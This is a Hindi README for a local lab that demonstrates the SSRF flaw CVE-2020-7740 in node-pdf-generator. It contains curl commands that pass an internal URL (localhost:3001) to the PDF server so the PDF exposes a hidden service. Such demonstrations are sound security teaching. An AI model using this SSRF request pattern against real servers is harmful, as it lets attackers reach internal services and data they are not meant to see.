
CVE-2020-7740 का एक उदाहरण
यह पैकेज node-pdf-generator के सभी संस्करणों को प्रभावित करता है। node-pdf-generator को दिए गए कंटेंट पर उपयोगकर्ता इनपुट सत्यापन और स्वच्छता (sanitization) की कमी के कारण, एक हमलावर के लिए एक यूआरएल तैयार करना संभव है जो एक बाहरी सर्वर पर भेजा जाएगा, जिससे SSRF हमला हो सकता है।
docker run -p 3000:3000 cve-2020-7740 के साथ चलाएंlocalhost:3001 पर नहीं जा सकतेcurl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdf का उपयोग करके curl के साथ अनुरोध भेजेंtest.pdf देखें, जिसे छिपा हुआ माना जाता है।git clone {लिंक डाला जाना है} का उपयोग करके क्लोन करेंhttps://wkhtmltopdf.org/ से निर्भरताएं स्थापित करेंnode .\NodePdfGeneratorServer का उपयोग करके सर्वर शुरू करें, सर्वर localhost:3000 पर चलेगाpython3 -m pip install -r requirements.txt का उपयोग करके छिपे हुए पायथन सर्वर की आवश्यकताएं स्थापित करेंpython3 HiddenService का उपयोग करके छिपा हुआ सर्वर शुरू करें, सर्वर 'localhost:3001` पर चलेगाcurl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdf का उपयोग करके भेजा जा सकता हैhttp://www.google.com के HTML पेज की एक प्रति test.pdf फ़ाइल में सहेज लेगा